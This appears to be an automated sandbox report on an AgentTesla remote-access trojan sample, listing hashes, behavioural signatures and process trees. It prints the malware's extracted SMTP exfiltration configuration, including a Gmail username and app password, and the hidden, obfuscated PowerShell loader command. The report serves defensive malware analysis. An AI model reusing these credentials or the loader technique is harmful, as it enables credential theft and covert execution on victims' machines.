Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/10/2024, 06:32
Static task
static1
Behavioral task
behavioral1
Sample
orig.eml.exe
Resource
win7-20240708-en
General
-
Target
orig.eml.exe
-
Size
859KB
-
MD5
33f2fb6f726399e47707e7ac57203448
-
SHA1
3192b72e25276bd9768d4890af8cfb19db2b8da7
-
SHA256
d16537ba8163e5d5c809fed22be949caaaf2fee5e1d5f5dcd9f9a36e4a3709b0
-
SHA512
67247f41dbc07e8dad555c992a98c6197671ba4730588c32ffb1e3ba230ad1c467fa28f355872cf5f76280b730985a1fa98d83bb1c585dd6a214e606f0d973b2
-
SSDEEP
24576:1AmVuKha1h4qNvjgWkGkky93X5WtswUlAniehy:6894NvJkZt93JSUynxhy
Malware Config
Extracted
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
nhpe dfhf irbv bqxe
Extracted
agenttesla
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
nhpe dfhf irbv bqxe - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 884 powershell.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 27 1192 msiexec.exe 30 1192 msiexec.exe 33 1192 msiexec.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 api.ipify.org 30 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1192 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 884 powershell.exe 1192 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language orig.eml.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 884 powershell.exe 884 powershell.exe 884 powershell.exe 884 powershell.exe 884 powershell.exe 884 powershell.exe 884 powershell.exe 1192 msiexec.exe 1192 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 884 powershell.exe Token: SeIncreaseQuotaPrivilege 884 powershell.exe Token: SeSecurityPrivilege 884 powershell.exe Token: SeTakeOwnershipPrivilege 884 powershell.exe Token: SeLoadDriverPrivilege 884 powershell.exe Token: SeSystemProfilePrivilege 884 powershell.exe Token: SeSystemtimePrivilege 884 powershell.exe Token: SeProfSingleProcessPrivilege 884 powershell.exe Token: SeIncBasePriorityPrivilege 884 powershell.exe Token: SeCreatePagefilePrivilege 884 powershell.exe Token: SeBackupPrivilege 884 powershell.exe Token: SeRestorePrivilege 884 powershell.exe Token: SeShutdownPrivilege 884 powershell.exe Token: SeDebugPrivilege 884 powershell.exe Token: SeSystemEnvironmentPrivilege 884 powershell.exe Token: SeRemoteShutdownPrivilege 884 powershell.exe Token: SeUndockPrivilege 884 powershell.exe Token: SeManageVolumePrivilege 884 powershell.exe Token: 33 884 powershell.exe Token: 34 884 powershell.exe Token: 35 884 powershell.exe Token: 36 884 powershell.exe Token: SeDebugPrivilege 1192 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3672 wrote to memory of 884 3672 orig.eml.exe 85 PID 3672 wrote to memory of 884 3672 orig.eml.exe 85 PID 3672 wrote to memory of 884 3672 orig.eml.exe 85 PID 884 wrote to memory of 1192 884 powershell.exe 96 PID 884 wrote to memory of 1192 884 powershell.exe 96 PID 884 wrote to memory of 1192 884 powershell.exe 96 PID 884 wrote to memory of 1192 884 powershell.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\orig.eml.exe"C:\Users\Admin\AppData\Local\Temp\orig.eml.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Amfiteaters=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\daaselatteren\Vrdireduktion\Varegruppen.Haz';$Overpassionately=$Amfiteaters.SubString(1248,3);.$Overpassionately($Amfiteaters) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
303KB
MD5dd9948fadcf1d524fa3f35b1c969f1de
SHA12b37d1860071709da63bd01d52f319adee65f917
SHA256583abe807da04cb69888b116481c42eb6c936cbdd5de33525d5e9d9b9bec5bd1
SHA5127943dde439124d747bdf2b7fd27a417c74ec58c66ec6407cd52a6d47fa439b8f4eb1d05934dc6ba0a7ee231d0ec0bb0edcbb4090ba569a11002e85228b51c0f9
-
Filesize
71KB
MD51ce478b91395dbe0988860105e517a4a
SHA1c1b115f9f1a16bb20079a782f813235ba8749145
SHA256de6bf32645671a2db64b0f945d13e83ef3a3fae717514f3b6349c119559498fe
SHA512f51b2ac5c4e9342de5bf074bfa21efff5fd10216cd3234824c43f0d90f4f6a2ae761720f7a225ec6334c512763a4927a55f59a27dc98e2ad6c8320585ae22152